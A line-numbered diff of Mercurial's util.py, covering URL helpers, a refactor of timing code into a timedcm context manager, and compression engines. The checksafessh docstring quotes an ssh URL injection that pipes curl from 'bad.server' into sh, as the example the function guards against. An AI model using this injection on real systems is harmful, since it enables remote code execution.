2792 2795 return (s, (None, (s, self.host),
2793 2796 self.user, self.passwd or ''))
2794 2797
2795 2798 def isabs(self):
2796 2799 if self.scheme and self.scheme != 'file':
2797 2800 return True # remote URL
2798 2801 if hasdriveletter(self.path):
2799 2802 return True # absolute for our purposes - can't be joined()
2800 2803 if self.path.startswith(br'\\'):
2801 2804 return True # Windows UNC path
2802 2805 if self.path.startswith('/'):
2803 2806 return True # POSIX-style
2804 2807 return False
2805 2808
2806 2809 def localpath(self):
2807 2810 if self.scheme == 'file' or self.scheme == 'bundle':
2808 2811 path = self.path or '/'
2809 2812 # For Windows, we need to promote hosts containing drive
2810 2813 # letters to paths with drive letters.
2811 2814 if hasdriveletter(self._hostport):
2812 2815 path = self._hostport + '/' + self.path
2813 2816 elif (self.host is not None and self.path
2814 2817 and not hasdriveletter(path)):
2815 2818 path = '/' + path
2816 2819 return path
2817 2820 return self._origpath
2818 2821
2819 2822 def islocal(self):
2820 2823 '''whether localpath will return something that posixfile can open'''
2821 2824 return (not self.scheme or self.scheme == 'file'
2822 2825 or self.scheme == 'bundle')
2823 2826
2824 2827 def hasscheme(path):
2825 2828 return bool(url(path).scheme)
2826 2829
2827 2830 def hasdriveletter(path):
2828 2831 return path and path[1:2] == ':' and path[0:1].isalpha()
2829 2832
2830 2833 def urllocalpath(path):
2831 2834 return url(path, parsequery=False, parsefragment=False).localpath()
2832 2835
2833 2836 def checksafessh(path):
2834 2837 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2835 2838
2836 2839 This is a sanity check for ssh urls. ssh will parse the first item as
2837 2840 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2838 2841 Let's prevent these potentially exploited urls entirely and warn the
2839 2842 user.
2840 2843
2841 2844 Raises an error.Abort when the url is unsafe.
2842 2845 """
2843 2846 path = urlreq.unquote(path)
2844 2847 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2845 2848 raise error.Abort(_('potentially unsafe url: %r') %
2846 2849 (pycompat.bytestr(path),))
2847 2850
2848 2851 def hidepassword(u):
2849 2852 '''hide user credential in a url string'''
2850 2853 u = url(u)
2851 2854 if u.passwd:
2852 2855 u.passwd = '***'
2853 2856 return bytes(u)
2854 2857
2855 2858 def removeauth(u):
2856 2859 '''remove all authentication information from a url string'''
2857 2860 u = url(u)
2858 2861 u.user = u.passwd = None
2859 2862 return bytes(u)
2860 2863
2861 2864 timecount = unitcountfn(
2862 2865 (1, 1e3, _('%.0f s')),
2863 2866 (100, 1, _('%.1f s')),
2864 2867 (10, 1, _('%.2f s')),
2865 2868 (1, 1, _('%.3f s')),
2866 2869 (100, 0.001, _('%.1f ms')),
2867 2870 (10, 0.001, _('%.2f ms')),
2868 2871 (1, 0.001, _('%.3f ms')),
2869 2872 (100, 0.000001, _('%.1f us')),
2870 2873 (10, 0.000001, _('%.2f us')),
2871 2874 (1, 0.000001, _('%.3f us')),
2872 2875 (100, 0.000000001, _('%.1f ns')),
2873 2876 (10, 0.000000001, _('%.2f ns')),
2874 2877 (1, 0.000000001, _('%.3f ns')),
2875 2878 )
2876 2879
2877 _timenesting = [0]
2880 @attr.s
2881 class timedcmstats(object):
2882 """Stats information produced by the timedcm context manager on entering."""
2883
2884 # the starting value of the timer as a float (meaning and resulution is
2885 # platform dependent, see util.timer)
2886 start = attr.ib(default=attr.Factory(lambda: timer()))
2887 # the number of seconds as a floating point value; starts at 0, updated when
2888 # the context is exited.
2889 elapsed = attr.ib(default=0)
2890 # the number of nested timedcm context managers.
2891 level = attr.ib(default=1)
2892
2893 def __str__(self):
2894 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2895
2896 @contextlib.contextmanager
2897 def timedcm():
2898 """A context manager that produces timing information for a given context.
2899
2900 On entering a timedcmstats instance is produced.
2901
2902 This context manager is reentrant.
2903
2904 """
2905 # track nested context managers
2906 timedcm._nested += 1
2907 timing_stats = timedcmstats(level=timedcm._nested)
2908 try:
2909 yield timing_stats
2910 finally:
2911 timing_stats.elapsed = timer() - timing_stats.start
2912 timedcm._nested -= 1
2913
2914 timedcm._nested = 0
2878 2915
2879 2916 def timed(func):
2880 2917 '''Report the execution time of a function call to stderr.
2881 2918
2882 2919 During development, use as a decorator when you need to measure
2883 2920 the cost of a function, e.g. as follows:
2884 2921
2885 2922 @util.timed
2886 2923 def foo(a, b, c):
2887 2924 pass
2888 2925 '''
2889 2926
2890 2927 def wrapper(*args, **kwargs):
2891 start = timer()
2892 indent = 2
2893 _timenesting[0] += indent
2894 try:
2895 return func(*args, **kwargs)
2896 finally:
2897 elapsed = timer() - start
2898 _timenesting[0] -= indent
2928 with timedcm() as time_stats:
2929 result = func(*args, **kwargs)
2899 2930 stderr = procutil.stderr
2900 stderr.write('%s%s: %s\n' %
2901 (' ' * _timenesting[0], func.__name__,
2902 timecount(elapsed)))
2931 stderr.write('%s%s: %s\n' % (
2932 ' ' * time_stats.level * 2, func.__name__, time_stats))
2933 return result
2903 2934 return wrapper
2904 2935
2905 2936 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2906 2937 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2907 2938
2908 2939 def sizetoint(s):
2909 2940 '''Convert a space specifier to a byte count.
2910 2941
2911 2942 >>> sizetoint(b'30')
2912 2943 30
2913 2944 >>> sizetoint(b'2.2kb')
2914 2945 2252
2915 2946 >>> sizetoint(b'6M')
2916 2947 6291456
2917 2948 '''
2918 2949 t = s.strip().lower()
2919 2950 try:
2920 2951 for k, u in _sizeunits:
2921 2952 if t.endswith(k):
2922 2953 return int(float(t[:-len(k)]) * u)
2923 2954 return int(t)
2924 2955 except ValueError:
2925 2956 raise error.ParseError(_("couldn't parse size: %s") % s)
2926 2957
2927 2958 class hooks(object):
2928 2959 '''A collection of hook functions that can be used to extend a
2929 2960 function's behavior. Hooks are called in lexicographic order,
2930 2961 based on the names of their sources.'''
2931 2962
2932 2963 def __init__(self):
2933 2964 self._hooks = []
2934 2965
2935 2966 def add(self, source, hook):
2936 2967 self._hooks.append((source, hook))
2937 2968
2938 2969 def __call__(self, *args):
2939 2970 self._hooks.sort(key=lambda x: x[0])
2940 2971 results = []
2941 2972 for source, hook in self._hooks:
2942 2973 results.append(hook(*args))
2943 2974 return results
2944 2975
2945 2976 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2946 2977 '''Yields lines for a nicely formatted stacktrace.
2947 2978 Skips the 'skip' last entries, then return the last 'depth' entries.
2948 2979 Each file+linenumber is formatted according to fileline.
2949 2980 Each line is formatted according to line.
2950 2981 If line is None, it yields:
2951 2982 length of longest filepath+line number,
2952 2983 filepath+linenumber,
2953 2984 function
2954 2985
2955 2986 Not be used in production code but very convenient while developing.
2956 2987 '''
2957 2988 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2958 2989 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2959 2990 ][-depth:]
2960 2991 if entries:
2961 2992 fnmax = max(len(entry[0]) for entry in entries)
2962 2993 for fnln, func in entries:
2963 2994 if line is None:
2964 2995 yield (fnmax, fnln, func)
2965 2996 else:
2966 2997 yield line % (fnmax, fnln, func)
2967 2998
2968 2999 def debugstacktrace(msg='stacktrace', skip=0,
2969 3000 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2970 3001 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2971 3002 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2972 3003 By default it will flush stdout first.
2973 3004 It can be used everywhere and intentionally does not require an ui object.
2974 3005 Not be used in production code but very convenient while developing.
2975 3006 '''
2976 3007 if otherf:
2977 3008 otherf.flush()
2978 3009 f.write('%s at:\n' % msg.rstrip())
2979 3010 for line in getstackframes(skip + 1, depth=depth):
2980 3011 f.write(line)
2981 3012 f.flush()
2982 3013
2983 3014 class dirs(object):
2984 3015 '''a multiset of directory names from a dirstate or manifest'''
2985 3016
2986 3017 def __init__(self, map, skip=None):
2987 3018 self._dirs = {}
2988 3019 addpath = self.addpath
2989 3020 if safehasattr(map, 'iteritems') and skip is not None:
2990 3021 for f, s in map.iteritems():
2991 3022 if s[0] != skip:
2992 3023 addpath(f)
2993 3024 else:
2994 3025 for f in map:
2995 3026 addpath(f)
2996 3027
2997 3028 def addpath(self, path):
2998 3029 dirs = self._dirs
2999 3030 for base in finddirs(path):
3000 3031 if base in dirs:
3001 3032 dirs[base] += 1
3002 3033 return
3003 3034 dirs[base] = 1
3004 3035
3005 3036 def delpath(self, path):
3006 3037 dirs = self._dirs
3007 3038 for base in finddirs(path):
3008 3039 if dirs[base] > 1:
3009 3040 dirs[base] -= 1
3010 3041 return
3011 3042 del dirs[base]
3012 3043
3013 3044 def __iter__(self):
3014 3045 return iter(self._dirs)
3015 3046
3016 3047 def __contains__(self, d):
3017 3048 return d in self._dirs
3018 3049
3019 3050 if safehasattr(parsers, 'dirs'):
3020 3051 dirs = parsers.dirs
3021 3052
3022 3053 def finddirs(path):
3023 3054 pos = path.rfind('/')
3024 3055 while pos != -1:
3025 3056 yield path[:pos]
3026 3057 pos = path.rfind('/', 0, pos)
3027 3058
3028 3059 # compression code
3029 3060
3030 3061 SERVERROLE = 'server'
3031 3062 CLIENTROLE = 'client'
3032 3063
3033 3064 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3034 3065 (u'name', u'serverpriority',
3035 3066 u'clientpriority'))
3036 3067
3037 3068 class compressormanager(object):
3038 3069 """Holds registrations of various compression engines.
3039 3070
3040 3071 This class essentially abstracts the differences between compression
3041 3072 engines to allow new compression formats to be added easily, possibly from
3042 3073 extensions.
3043 3074
3044 3075 Compressors are registered against the global instance by calling its
3045 3076 ``register()`` method.
3046 3077 """
3047 3078 def __init__(self):
3048 3079 self._engines = {}
3049 3080 # Bundle spec human name to engine name.
3050 3081 self._bundlenames = {}
3051 3082 # Internal bundle identifier to engine name.
3052 3083 self._bundletypes = {}
3053 3084 # Revlog header to engine name.
3054 3085 self._revlogheaders = {}
3055 3086 # Wire proto identifier to engine name.
3056 3087 self._wiretypes = {}
3057 3088
3058 3089 def __getitem__(self, key):
3059 3090 return self._engines[key]
3060 3091
3061 3092 def __contains__(self, key):
3062 3093 return key in self._engines
3063 3094
3064 3095 def __iter__(self):
3065 3096 return iter(self._engines.keys())
3066 3097
3067 3098 def register(self, engine):
3068 3099 """Register a compression engine with the manager.
3069 3100
3070 3101 The argument must be a ``compressionengine`` instance.
3071 3102 """
3072 3103 if not isinstance(engine, compressionengine):
3073 3104 raise ValueError(_('argument must be a compressionengine'))
3074 3105
3075 3106 name = engine.name()
3076 3107
3077 3108 if name in self._engines:
3078 3109 raise error.Abort(_('compression engine %s already registered') %
3079 3110 name)
3080 3111
3081 3112 bundleinfo = engine.bundletype()
3082 3113 if bundleinfo:
3083 3114 bundlename, bundletype = bundleinfo
3084 3115
3085 3116 if bundlename in self._bundlenames:
3086 3117 raise error.Abort(_('bundle name %s already registered') %
3087 3118 bundlename)
3088 3119 if bundletype in self._bundletypes:
3089 3120 raise error.Abort(_('bundle type %s already registered by %s') %
3090 3121 (bundletype, self._bundletypes[bundletype]))
3091 3122
3092 3123 # No external facing name declared.
3093 3124 if bundlename:
3094 3125 self._bundlenames[bundlename] = name
3095 3126
3096 3127 self._bundletypes[bundletype] = name
3097 3128
3098 3129 wiresupport = engine.wireprotosupport()
3099 3130 if wiresupport:
3100 3131 wiretype = wiresupport.name
3101 3132 if wiretype in self._wiretypes:
3102 3133 raise error.Abort(_('wire protocol compression %s already '
3103 3134 'registered by %s') %
3104 3135 (wiretype, self._wiretypes[wiretype]))
3105 3136
3106 3137 self._wiretypes[wiretype] = name
3107 3138
3108 3139 revlogheader = engine.revlogheader()
3109 3140 if revlogheader and revlogheader in self._revlogheaders:
3110 3141 raise error.Abort(_('revlog header %s already registered by %s') %
3111 3142 (revlogheader, self._revlogheaders[revlogheader]))
3112 3143
3113 3144 if revlogheader:
3114 3145 self._revlogheaders[revlogheader] = name
3115 3146
3116 3147 self._engines[name] = engine
3117 3148
3118 3149 @property
3119 3150 def supportedbundlenames(self):
3120 3151 return set(self._bundlenames.keys())
3121 3152
3122 3153 @property
3123 3154 def supportedbundletypes(self):
3124 3155 return set(self._bundletypes.keys())
3125 3156
3126 3157 def forbundlename(self, bundlename):
3127 3158 """Obtain a compression engine registered to a bundle name.
3128 3159
3129 3160 Will raise KeyError if the bundle type isn't registered.
3130 3161
3131 3162 Will abort if the engine is known but not available.
3132 3163 """
3133 3164 engine = self._engines[self._bundlenames[bundlename]]
3134 3165 if not engine.available():
3135 3166 raise error.Abort(_('compression engine %s could not be loaded') %
3136 3167 engine.name())
3137 3168 return engine
3138 3169
3139 3170 def forbundletype(self, bundletype):
3140 3171 """Obtain a compression engine registered to a bundle type.
3141 3172
3142 3173 Will raise KeyError if the bundle type isn't registered.
3143 3174
3144 3175 Will abort if the engine is known but not available.
3145 3176 """
3146 3177 engine = self._engines[self._bundletypes[bundletype]]
3147 3178 if not engine.available():
3148 3179 raise error.Abort(_('compression engine %s could not be loaded') %
3149 3180 engine.name())
3150 3181 return engine
3151 3182
3152 3183 def supportedwireengines(self, role, onlyavailable=True):
3153 3184 """Obtain compression engines that support the wire protocol.
3154 3185
3155 3186 Returns a list of engines in prioritized order, most desired first.
3156 3187
3157 3188 If ``onlyavailable`` is set, filter out engines that can't be
3158 3189 loaded.
3159 3190 """
3160 3191 assert role in (SERVERROLE, CLIENTROLE)
3161 3192
3162 3193 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3163 3194
3164 3195 engines = [self._engines[e] for e in self._wiretypes.values()]
3165 3196 if onlyavailable:
3166 3197 engines = [e for e in engines if e.available()]
3167 3198
3168 3199 def getkey(e):
3169 3200 # Sort first by priority, highest first. In case of tie, sort
3170 3201 # alphabetically. This is arbitrary, but ensures output is
3171 3202 # stable.
3172 3203 w = e.wireprotosupport()
3173 3204 return -1 * getattr(w, attr), w.name
3174 3205
3175 3206 return list(sorted(engines, key=getkey))
3176 3207
3177 3208 def forwiretype(self, wiretype):
3178 3209 engine = self._engines[self._wiretypes[wiretype]]
3179 3210 if not engine.available():
3180 3211 raise error.Abort(_('compression engine %s could not be loaded') %
3181 3212 engine.name())
3182 3213 return engine
3183 3214
3184 3215 def forrevlogheader(self, header):
3185 3216 """Obtain a compression engine registered to a revlog header.
3186 3217
3187 3218 Will raise KeyError if the revlog header value isn't registered.
3188 3219 """
3189 3220 return self._engines[self._revlogheaders[header]]
3190 3221
3191 3222 compengines = compressormanager()
3192 3223
3193 3224 class compressionengine(object):
3194 3225 """Base class for compression engines.
3195 3226
3196 3227 Compression engines must implement the interface defined by this class.
3197 3228 """
3198 3229 def name(self):
3199 3230 """Returns the name of the compression engine.
3200 3231
3201 3232 This is the key the engine is registered under.
3202 3233
3203 3234 This method must be implemented.
3204 3235 """
3205 3236 raise NotImplementedError()
3206 3237
3207 3238 def available(self):
3208 3239 """Whether the compression engine is available.
3209 3240
3210 3241 The intent of this method is to allow optional compression engines
3211 3242 that may not be available in all installations (such as engines relying
3212 3243 on C extensions that may not be present).
3213 3244 """
3214 3245 return True
3215 3246
3216 3247 def bundletype(self):
3217 3248 """Describes bundle identifiers for this engine.
3218 3249
3219 3250 If this compression engine isn't supported for bundles, returns None.
3220 3251
3221 3252 If this engine can be used for bundles, returns a 2-tuple of strings of
3222 3253 the user-facing "bundle spec" compression name and an internal
3223 3254 identifier used to denote the compression format within bundles. To
3224 3255 exclude the name from external usage, set the first element to ``None``.
3225 3256
3226 3257 If bundle compression is supported, the class must also implement
3227 3258 ``compressstream`` and `decompressorreader``.
3228 3259
3229 3260 The docstring of this method is used in the help system to tell users
3230 3261 about this engine.
3231 3262 """
3232 3263 return None
3233 3264
3234 3265 def wireprotosupport(self):
3235 3266 """Declare support for this compression format on the wire protocol.
3236 3267
3237 3268 If this compression engine isn't supported for compressing wire
3238 3269 protocol payloads, returns None.
3239 3270
3240 3271 Otherwise, returns ``compenginewireprotosupport`` with the following
3241 3272 fields:
3242 3273
3243 3274 * String format identifier
3244 3275 * Integer priority for the server
3245 3276 * Integer priority for the client
3246 3277
3247 3278 The integer priorities are used to order the advertisement of format
3248 3279 support by server and client. The highest integer is advertised
3249 3280 first. Integers with non-positive values aren't advertised.
3250 3281
3251 3282 The priority values are somewhat arbitrary and only used for default
3252 3283 ordering. The relative order can be changed via config options.
3253 3284
3254 3285 If wire protocol compression is supported, the class must also implement
3255 3286 ``compressstream`` and ``decompressorreader``.
3256 3287 """
3257 3288 return None
3258 3289
3259 3290 def revlogheader(self):
3260 3291 """Header added to revlog chunks that identifies this engine.
3261 3292
3262 3293 If this engine can be used to compress revlogs, this method should
3263 3294 return the bytes used to identify chunks compressed with this engine.
3264 3295 Else, the method should return ``None`` to indicate it does not
3265 3296 participate in revlog compression.
3266 3297 """
3267 3298 return None
3268 3299
3269 3300 def compressstream(self, it, opts=None):
3270 3301 """Compress an iterator of chunks.
3271 3302
3272 3303 The method receives an iterator (ideally a generator) of chunks of
3273 3304 bytes to be compressed. It returns an iterator (ideally a generator)
3274 3305 of bytes of chunks representing the compressed output.
3275 3306
3276 3307 Optionally accepts an argument defining how to perform compression.
3277 3308 Each engine treats this argument differently.
3278 3309 """
3279 3310 raise NotImplementedError()
3280 3311
3281 3312 def decompressorreader(self, fh):
3282 3313 """Perform decompression on a file object.
3283 3314
3284 3315 Argument is an object with a ``read(size)`` method that returns
3285 3316 compressed data. Return value is an object with a ``read(size)`` that
3286 3317 returns uncompressed data.
3287 3318 """
3288 3319 raise NotImplementedError()
3289 3320
3290 3321 def revlogcompressor(self, opts=None):
3291 3322 """Obtain an object that can be used to compress revlog entries.
3292 3323
3293 3324 The object has a ``compress(data)`` method that compresses binary
3294 3325 data. This method returns compressed binary data or ``None`` if
3295 3326 the data could not be compressed (too small, not compressible, etc).
3296 3327 The returned data should have a header uniquely identifying this
3297 3328 compression format so decompression can be routed to this engine.
3298 3329 This header should be identified by the ``revlogheader()`` return
3299 3330 value.
3300 3331
3301 3332 The object has a ``decompress(data)`` method that decompresses
3302 3333 data. The method will only be called if ``data`` begins with
3303 3334 ``revlogheader()``. The method should return the raw, uncompressed
3304 3335 data or raise a ``RevlogError``.
3305 3336
3306 3337 The object is reusable but is not thread safe.
3307 3338 """
3308 3339 raise NotImplementedError()
3309 3340
3310 3341 class _CompressedStreamReader(object):
3311 3342 def __init__(self, fh):
3312 3343 if safehasattr(fh, 'unbufferedread'):
3313 3344 self._reader = fh.unbufferedread
3314 3345 else:
3315 3346 self._reader = fh.read
3316 3347 self._pending = []
3317 3348 self._pos = 0
3318 3349 self._eof = False
3319 3350
3320 3351 def _decompress(self, chunk):
3321 3352 raise NotImplementedError()
3322 3353
3323 3354 def read(self, l):
3324 3355 buf = []
3325 3356 while True:
3326 3357 while self._pending:
3327 3358 if len(self._pending[0]) > l + self._pos:
3328 3359 newbuf = self._pending[0]
3329 3360 buf.append(newbuf[self._pos:self._pos + l])
3330 3361 self._pos += l
3331 3362 return ''.join(buf)
3332 3363
3333 3364 newbuf = self._pending.pop(0)
3334 3365 if self._pos:
3335 3366 buf.append(newbuf[self._pos:])
3336 3367 l -= len(newbuf) - self._pos
3337 3368 else:
3338 3369 buf.append(newbuf)
3339 3370 l -= len(newbuf)
3340 3371 self._pos = 0
3341 3372
3342 3373 if self._eof:
3343 3374 return ''.join(buf)
3344 3375 chunk = self._reader(65536)
3345 3376 self._decompress(chunk)
3346 3377
3347 3378 class _GzipCompressedStreamReader(_CompressedStreamReader):
3348 3379 def __init__(self, fh):
3349 3380 super(_GzipCompressedStreamReader, self).__init__(fh)
3350 3381 self._decompobj = zlib.decompressobj()
3351 3382 def _decompress(self, chunk):
3352 3383 newbuf = self._decompobj.decompress(chunk)
3353 3384 if newbuf:
3354 3385 self._pending.append(newbuf)
3355 3386 d = self._decompobj.copy()
3356 3387 try:
3357 3388 d.decompress('x')
3358 3389 d.flush()
3359 3390 if d.unused_data == 'x':
3360 3391 self._eof = True
3361 3392 except zlib.error:
3362 3393 pass
3363 3394
3364 3395 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3365 3396 def __init__(self, fh):
3366 3397 super(_BZ2CompressedStreamReader, self).__init__(fh)
3367 3398 self._decompobj = bz2.BZ2Decompressor()
3368 3399 def _decompress(self, chunk):
3369 3400 newbuf = self._decompobj.decompress(chunk)
3370 3401 if newbuf:
3371 3402 self._pending.append(newbuf)
3372 3403 try:
3373 3404 while True:
3374 3405 newbuf = self._decompobj.decompress('')
3375 3406 if newbuf:
3376 3407 self._pending.append(newbuf)
3377 3408 else:
3378 3409 break
3379 3410 except EOFError:
3380 3411 self._eof = True
3381 3412
3382 3413 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3383 3414 def __init__(self, fh):
3384 3415 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3385 3416 newbuf = self._decompobj.decompress('BZ')
3386 3417 if newbuf:
3387 3418 self._pending.append(newbuf)
3388 3419
3389 3420 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3390 3421 def __init__(self, fh, zstd):
3391 3422 super(_ZstdCompressedStreamReader, self).__init__(fh)
3392 3423 self._zstd = zstd
3393 3424 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3394 3425 def _decompress(self, chunk):
3395 3426 newbuf = self._decompobj.decompress(chunk)
3396 3427 if newbuf:
3397 3428 self._pending.append(newbuf)
3398 3429 try:
3399 3430 while True:
3400 3431 newbuf = self._decompobj.decompress('')
3401 3432 if newbuf:
3402 3433 self._pending.append(newbuf)
3403 3434 else:
3404 3435 break
3405 3436 except self._zstd.ZstdError:
3406 3437 self._eof = True
3407 3438
3408 3439 class _zlibengine(compressionengine):
3409 3440 def name(self):
3410 3441 return 'zlib'
3411 3442
3412 3443 def bundletype(self):
3413 3444 """zlib compression using the DEFLATE algorithm.
3414 3445
3415 3446 All Mercurial clients should support this format. The compression
3416 3447 algorithm strikes a reasonable balance between compression ratio
3417 3448 and size.
3418 3449 """
3419 3450 return 'gzip', 'GZ'
3420 3451
3421 3452 def wireprotosupport(self):
3422 3453 return compewireprotosupport('zlib', 20, 20)
3423 3454
3424 3455 def revlogheader(self):
3425 3456 return 'x'
3426 3457
3427 3458 def compressstream(self, it, opts=None):
3428 3459 opts = opts or {}
3429 3460
3430 3461 z = zlib.compressobj(opts.get('level', -1))
3431 3462 for chunk in it:
3432 3463 data = z.compress(chunk)
3433 3464 # Not all calls to compress emit data. It is cheaper to inspect
3434 3465 # here than to feed empty chunks through generator.
3435 3466 if data:
3436 3467 yield data
3437 3468
3438 3469 yield z.flush()
3439 3470
3440 3471 def decompressorreader(self, fh):
3441 3472 return _GzipCompressedStreamReader(fh)
3442 3473
3443 3474 class zlibrevlogcompressor(object):
3444 3475 def compress(self, data):
3445 3476 insize = len(data)
3446 3477 # Caller handles empty input case.
3447 3478 assert insize > 0
3448 3479
3449 3480 if insize < 44:
3450 3481 return None
3451 3482
3452 3483 elif insize <= 1000000:
3453 3484 compressed = zlib.compress(data)
3454 3485 if len(compressed) < insize:
3455 3486 return compressed
3456 3487 return None
3457 3488
3458 3489 # zlib makes an internal copy of the input buffer, doubling
3459 3490 # memory usage for large inputs. So do streaming compression
3460 3491 # on large inputs.
3461 3492 else:
3462 3493 z = zlib.compressobj()
3463 3494 parts = []
3464 3495 pos = 0
3465 3496 while pos < insize:
3466 3497 pos2 = pos + 2**20
3467 3498 parts.append(z.compress(data[pos:pos2]))
3468 3499 pos = pos2
3469 3500 parts.append(z.flush())
3470 3501
3471 3502 if sum(map(len, parts)) < insize:
3472 3503 return ''.join(parts)
3473 3504 return None
3474 3505
3475 3506 def decompress(self, data):
3476 3507 try:
3477 3508 return zlib.decompress(data)
3478 3509 except zlib.error as e:
3479 3510 raise error.RevlogError(_('revlog decompress error: %s') %
3480 3511 stringutil.forcebytestr(e))
3481 3512
3482 3513 def revlogcompressor(self, opts=None):
3483 3514 return self.zlibrevlogcompressor()
3484 3515
3485 3516 compengines.register(_zlibengine())
3486 3517
3487 3518 class _bz2engine(compressionengine):
3488 3519 def name(self):
3489 3520 return 'bz2'
3490 3521
3491 3522 def bundletype(self):
3492 3523 """An algorithm that produces smaller bundles than ``gzip``.
3493 3524
3494 3525 All Mercurial clients should support this format.
3495 3526
3496 3527 This engine will likely produce smaller bundles than ``gzip`` but
3497 3528 will be significantly slower, both during compression and
3498 3529 decompression.
3499 3530
3500 3531 If available, the ``zstd`` engine can yield similar or better
3501 3532 compression at much higher speeds.
3502 3533 """
3503 3534 return 'bzip2', 'BZ'
3504 3535
3505 3536 # We declare a protocol name but don't advertise by default because
3506 3537 # it is slow.
3507 3538 def wireprotosupport(self):
3508 3539 return compewireprotosupport('bzip2', 0, 0)
3509 3540
3510 3541 def compressstream(self, it, opts=None):
3511 3542 opts = opts or {}
3512 3543 z = bz2.BZ2Compressor(opts.get('level', 9))
3513 3544 for chunk in it:
3514 3545 data = z.compress(chunk)
3515 3546 if data:
3516 3547 yield data
3517 3548
3518 3549 yield z.flush()
3519 3550
3520 3551 def decompressorreader(self, fh):
3521 3552 return _BZ2CompressedStreamReader(fh)
3522 3553
3523 3554 compengines.register(_bz2engine())
3524 3555
3525 3556 class _truncatedbz2engine(compressionengine):
3526 3557 def name(self):
3527 3558 return 'bz2truncated'
3528 3559
3529 3560 def bundletype(self):
3530 3561 return None, '_truncatedBZ'
3531 3562
3532 3563 # We don't implement compressstream because it is hackily handled elsewhere.
3533 3564
3534 3565 def decompressorreader(self, fh):
3535 3566 return _TruncatedBZ2CompressedStreamReader(fh)
3536 3567
3537 3568 compengines.register(_truncatedbz2engine())
3538 3569
3539 3570 class _noopengine(compressionengine):
3540 3571 def name(self):
3541 3572 return 'none'
3542 3573
3543 3574 def bundletype(self):
3544 3575 """No compression is performed.
3545 3576
3546 3577 Use this compression engine to explicitly disable compression.
3547 3578 """
3548 3579 return 'none', 'UN'
3549 3580
3550 3581 # Clients always support uncompressed payloads. Servers don't because
3551 3582 # unless you are on a fast network, uncompressed payloads can easily
3552 3583 # saturate your network pipe.
3553 3584 def wireprotosupport(self):
3554 3585 return compewireprotosupport('none', 0, 10)
3555 3586
3556 3587 # We don't implement revlogheader because it is handled specially
3557 3588 # in the revlog class.
3558 3589
3559 3590 def compressstream(self, it, opts=None):
3560 3591 return it
3561 3592
3562 3593 def decompressorreader(self, fh):
3563 3594 return fh
3564 3595
3565 3596 class nooprevlogcompressor(object):
3566 3597 def compress(self, data):
3567 3598 return None
3568 3599
3569 3600 def revlogcompressor(self, opts=None):
3570 3601 return self.nooprevlogcompressor()
3571 3602
3572 3603 compengines.register(_noopengine())
3573 3604
3574 3605 class _zstdengine(compressionengine):
3575 3606 def name(self):
3576 3607 return 'zstd'
3577 3608
3578 3609 @propertycache
3579 3610 def _module(self):
3580 3611 # Not all installs have the zstd module available. So defer importing
3581 3612 # until first access.
3582 3613 try:
3583 3614 from . import zstd
3584 3615 # Force delayed import.
3585 3616 zstd.__version__
3586 3617 return zstd
3587 3618 except ImportError:
3588 3619 return None
3589 3620
3590 3621 def available(self):
3591 3622 return bool(self._module)
3592 3623
3593 3624 def bundletype(self):
3594 3625 """A modern compression algorithm that is fast and highly flexible.
3595 3626
3596 3627 Only supported by Mercurial 4.1 and newer clients.
3597 3628
3598 3629 With the default settings, zstd compression is both faster and yields
3599 3630 better compression than ``gzip``. It also frequently yields better
3600 3631 compression than ``bzip2`` while operating at much higher speeds.
3601 3632
3602 3633 If this engine is available and backwards compatibility is not a
3603 3634 concern, it is likely the best available engine.
3604 3635 """
3605 3636 return 'zstd', 'ZS'
3606 3637
3607 3638 def wireprotosupport(self):
3608 3639 return compewireprotosupport('zstd', 50, 50)
3609 3640
3610 3641 def revlogheader(self):
3611 3642 return '\x28'
3612 3643
3613 3644 def compressstream(self, it, opts=None):
3614 3645 opts = opts or {}
3615 3646 # zstd level 3 is almost always significantly faster than zlib
3616 3647 # while providing no worse compression. It strikes a good balance
3617 3648 # between speed and compression.
3618 3649 level = opts.get('level', 3)
3619 3650
3620 3651 zstd = self._module
3621 3652 z = zstd.ZstdCompressor(level=level).compressobj()
3622 3653 for chunk in it:
3623 3654 data = z.compress(chunk)
3624 3655 if data:
3625 3656 yield data
3626 3657
3627 3658 yield z.flush()
3628 3659
3629 3660 def decompressorreader(self, fh):
3630 3661 return _ZstdCompressedStreamReader(fh, self._module)
3631 3662
3632 3663 class zstdrevlogcompressor(object):
3633 3664 def __init__(self, zstd, level=3):
3634 3665 # TODO consider omitting frame magic to save 4 bytes.
3635 3666 # This writes content sizes into the frame header. That is
3636 3667 # extra storage. But it allows a correct size memory allocation
3637 3668 # to hold the result.
3638 3669 self._cctx = zstd.ZstdCompressor(level=level)
3639 3670 self._dctx = zstd.ZstdDecompressor()
3640 3671 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3641 3672 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3642 3673
3643 3674 def compress(self, data):
3644 3675 insize = len(data)
3645 3676 # Caller handles empty input case.
3646 3677 assert insize > 0
3647 3678
3648 3679 if insize < 50:
3649 3680 return None
3650 3681
3651 3682 elif insize <= 1000000:
3652 3683 compressed = self._cctx.compress(data)
3653 3684 if len(compressed) < insize:
3654 3685 return compressed
3655 3686 return None
3656 3687 else:
3657 3688 z = self._cctx.compressobj()
3658 3689 chunks = []
3659 3690 pos = 0
3660 3691 while pos < insize:
3661 3692 pos2 = pos + self._compinsize
3662 3693 chunk = z.compress(data[pos:pos2])
3663 3694 if chunk:
3664 3695 chunks.append(chunk)
3665 3696 pos = pos2
